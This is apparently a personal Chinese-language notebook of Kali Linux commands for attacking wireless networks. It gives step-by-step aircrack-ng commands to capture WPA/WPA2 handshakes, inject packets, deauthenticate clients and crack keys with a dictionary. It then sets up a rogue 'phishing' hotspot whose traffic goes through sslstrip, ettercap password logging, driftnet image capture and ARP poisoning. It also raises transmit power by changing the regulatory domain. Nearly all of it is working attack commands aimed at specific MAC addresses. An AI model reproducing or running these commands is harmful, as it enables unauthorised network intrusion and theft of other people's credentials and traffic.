kali---aircrack-ng
1.下载安装aircrack-ng
a.直接从源中安装
apt-get install aircrack-ng
b.下载编译安装
下载aircrack-ng-1.1.tar.gz(http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz)
解压缩,进入解压缩后的目录,对Makefile进行make,然后使用make Makefile install进行安装
可能需要安装openssl才能够正常编译。
可以使用命令
apt-get install libssl-dev
来安装openssl
2.启动无线,开一个终端,ifconfig -a看看wlan是否开启,开启正常可进行下一步。这时还可以获得本机的mac地址。
3.寻找要的网络,开启。开启终端1.
a.使用命令
iwlist wlan0 scanning
有的无线在最后终止监控wlan0mon后再使用这个命令会没有用,这是需要重启这个无线网卡。本次测试中所使用的无线就会出现这种情况。
然后找到所选的网络,获得其mac地址,通道,essid等信息
使用命令
airmon-ng start wlan0
开启一个监控
4.开启终端1
ifconfig
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
rfkill list
rfkill unblock 2
b.使用命令
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
airodump-ng wlan0mon -c 6
airodump-ng wlan0mon --encrypt WPA2
airodump-ng wlan0mon --encrypt OPN
airodump-ng wlan0mon --essid 607
airodump-ng wlan0mon --essid 606-ztg
airodump-ng wlan0 --essid 606-ztg
airodump-ng -w longas wlan0mon --essid aidajingjing
这时会看到无线的地址出现在屏幕上。
屏幕上会显示出它们的mac地址以及所在频道。
选择所需的无线,记录其所在的频道以及mac地址。
4.开启终端2
使用命令
airodump-ng -c 频道 --bssid 目标主机的mac -w name wlan0mon
airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w name wlan0mon
airodump-ng -c 10 --bssid 14:75:90:8B:BE:4E -w name wlan0mon
00:23:6C:97:21:89
00:26:C7:72:B2:3C
F0:27:65:6B:09:97
A8:A6:68:1A:D8:1D
这里的name为存包文件的名字,可以更改。
5.开启终端3
使用命令
aireplay-ng -1 0 -a 目标的mac -h 本机的mac wlan0mon
aireplay-ng -1 0 -a C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon
这时会有成功字样显示。如果没有显示可能就是目标不支持或者系统部稳定,需要更换目标了。
显示成功后进行下步。
继续输入命令
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目标的mac -h 本机的mac wlan0mon
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b C8:3A:35:14:AB:18 -h C8:AA:21:DF:0D:6D wlan0mon
此时终端2中的数据会增长很快,当数据到达5000的时候就可以了。
root@debian:~# aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon
7.开启终端4
使用命令longas
aircrack-ng name*.cap
aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst longas*.cap
name为自己索取的名字
8.最后
在一个终端中输入命令
airmon-ng stop wlan0mon
结束监控过程
(airomon-ng check可以查看你开启了多少监控,如果运行多组的时候可以查看后选择关闭)
++++++++++++++++++++++++++ 使用Aircrack-ng,WPA/WPA2-PSK加密无线网络 ++++++++++++++++++++++++++++++++++
CH 1 ][ Elapsed: 4 mins ][ 2015-09-07 07:53
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:3A:35:14:AB:18 -3 748 154 0 10 54e WPA CCMP PSK 606-ztg
BSSID STATION PWR Rate Lost Frames Probe
C8:3A:35:14:AB:18 C8:AA:21:DF:0D:6D -25 1e- 1e 0 156
开启终端1
ifconfig -a
airmon-ng start wlan0
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
rfkill list
rfkill unblock 2
airodump-ng -w name wlan0mon
airodump-ng -w name wlan0mon --essid 606-ztg
开启终端2
airodump-ng -c 10 --bssid C8:3A:35:14:AB:18 -w log wlan0mon
开启终端3
aireplay-ng -0 1 -a C8:3A:35:14:AB:18 -c C8:AA:21:DF:0D:6D wlan0mon
开启终端4
aircrack-ng -w /root/桌面/aircrack-ng-dictionary/all.lst log*.cap
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ifconfig
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
rfkill list
rfkill block 2
rfkill unblock 2
airmon-ng start wlan0
airmon-ng stop wlan0
airodump-ng wlan0mon
airodump-ng wlan0mon --bssid D8:5D:4C:32:CB:A6
airodump-ng wlan0mon -c 6
airodump-ng wlan0mon --encrypt WPA2
airodump-ng wlan0mon --encrypt OPN
airodump-ng wlan0mon --essid 607
airodump-ng -w longas wlan0mon --essid aidajingjing
+++++++++++++++++++++++ 7.5 实例——Kali Linux中创建钓鱼WiFi热点 +++++++++++++++++++++++++++++++++++++
ifconfig -a
airmon-ng start wlan0 #激活网卡至监听模式
airodump-ng wlan0mon
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
rfkill list
rfkill unblock 2
airbase-ng -c 12 -e ztg wlan0mon
root@debian:~# iw wlan0mon del
root@debian:~# iw wlan0 del
root@debian:~# iw phy phy0 interface add wlan0 type monitor
+++++++++++++++++++++++ 利用Kali进行WiFi钓鱼测试实战 +++++++++++++++++++++++++++++++++++++
http://www.freebuf.com/articles/wireless/69840.html
route -n -A inet | grep UG
0.0.0.0 10.108.160.1 0.0.0.0 UG 1024 0 0 eth0
10.3.9.31 10.108.160.1 255.255.255.255 UGH 1 0 0 eth0
gatewayip = 10.108.160.1
internet_interface = eth0
fakeap_interface = wlan0
ESSID = aaaa
-------终端窗口1
ifconfig -a
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
SIOCSIFFLAGS: Operation not possible due to RF-kill
rfkill list
0: phy0: Wireless LAN
Soft blocked: yes
Hard blocked: no
1: tpacpi_bluetooth_sw: Bluetooth
Soft blocked: no
Hard blocked: no
2: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
rfkill unblock 1
ifconfig wlan0 up
airmon-ng start wlan0
root@debian:~# airbase-ng -e ztg wlan0
airbase-ng wlan0 -e ztg -c 10
airbase-ng wlan0mon -e ztg -c 10
iw wlan0 del; iw wlan0mon del; iw phy phy0 interface add wlan0 type monitor;
iw wlan0 del; iw phy phy0 interface add wlan0 type monitor; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airmon-ng start wlan0; airbase-ng wlan0 -e ztg -c 10
ifconfig wlan0 down; ifconfig wlan0 up; ifconfig wlan0 mtu 1400; airbase-ng wlan0 -e ztg -c 10
-------
//airmon-ng start wlan0
//airbase-ng -c 12 -e ztg wlan0
-------终端窗口2
root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; ifconfig at0 mtu 1420; ifconfig wlan0 mtu 1460; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;
root@debian:~# ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0; route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables -F; iptables -X; iptables -Z; iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables -t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE;
-------
# Tables
ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1420
ifconfig wlan0 mtu 1460
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
iptables -t nat -X
iptables -t nat -Z
iptables -t mangle -F
iptables -t mangle -X
iptables -t mangle -Z
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
//iptables -A FORWARD -i eth0 -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT
//iptables -A FORWARD -i at0 -o eth0 -j ACCEPT
//iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
//iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j SNAT --to-source 10.108.160.1
//iptables -t nat -A PREROUTING -i at0 -j DNAT --to-source 10.108.160.1
-------终端窗口3
root@debian:~# /etc/init.d/isc-dhcp-server stop; dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
-------
# DHCP
#dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server restart
/etc/init.d/isc-dhcp-server start
/etc/init.d/isc-dhcp-server stop
dhcpd -d -f -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0; /etc/init.d/isc-dhcp-server restart;
-------终端窗口4
root@debian:~# driftnet -i at0
-------
-------终端窗口4
root@debian:~# sslstrip -f -p -k 10000
-------
-------终端窗口5
root@debian:~# ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0
-------
-------终端窗口6
root@debian:~# mkdir -p "/pentest/wireless/airssl/driftnetdata"
root@debian:~# driftnet -i eth0 -p -d /pentest/wireless/airssl/driftnetdata
-------
export PATH=$PATH:/mnt/opt/android-on-linux/android-sdk-linux/platform-tools/
iwconfig wlan0 txpower 15
iw dev wlan0 set txpower fixed 30
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp --syn -s 192.168.1.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
iw phy0 info
iw wlan0 info
root@debian:~# cat /etc/NetworkManager/system-connections/
++++++++++++++设置发射功率
iw list
ifconfig wlan0 down
iw reg set BO
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30
ifconfig wlan0 up
+++++++++++++++++++
ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/
ettercap -T -q -M ARP //192.168.0.1/ //192.168.0.101/
ettercap -T -M arp:remote //192.168.0.1/ //192.168.1.101/
++++++++++++++++++
oot@debian:~# lspci -tv
-[0000:00]-+-00.0 Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor DRAM Controller
+-01.0-[01]----00.0 NVIDIA Corporation GF117M [GeForce 610M/710M/820M / GT 620M/625M/630M/720M]
+-02.0 Intel Corporation 4th Gen Core Processor Integrated Graphics Controller
+-03.0 Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor HD Audio Controller
+-14.0 Intel Corporation 8 Series/C220 Series Chipset Family USB xHCI
+-16.0 Intel Corporation 8 Series/C220 Series Chipset Family MEI Controller #1
+-1a.0 Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #2
+-1b.0 Intel Corporation 8 Series/C220 Series Chipset High Definition Audio Controller
+-1c.0-[02-06]--
+-1c.1-[07]----00.0 Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter
+-1c.2-[08-0c]--
+-1c.3-[0d]----00.0 Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller
+-1c.4-[0e-12]----00.0 Realtek Semiconductor Co., Ltd. RTS5227 PCI Express Card Reader
+-1d.0 Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #1
+-1f.0 Intel Corporation HM86 Express LPC Controller
+-1f.2 Intel Corporation 8 Series/C220 Series Chipset Family 6-port SATA Controller 1 [AHCI mode]
\-1f.3 Intel Corporation 8 Series/C220 Series Chipset Family SMBus Controller
root@debian:~#
root@debian:~# lspci -vnn
07:00.0 Network controller [0280]: Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter [10ec:b723]
Subsystem: Lenovo Device [17aa:b728]
Flags: bus master, fast devsel, latency 0, IRQ 17
I/O ports at 6000 [size=256]
Memory at f5d00000 (64-bit, non-prefetchable) [size=16K]
Capabilities: [40] Power Management version 3
Capabilities: [50] MSI: Enable- Count=1/1 Maskable- 64bit+
Capabilities: [70] Express Endpoint, MSI 00
Capabilities: [100] Advanced Error Reporting
Capabilities: [140] Device Serial Number 00-23-b7-fe-ff-4c-e0-00
Capabilities: [150] Latency Tolerance Reporting
Capabilities: [158] L1 PM Substates
Kernel driver in use: rtl8723be
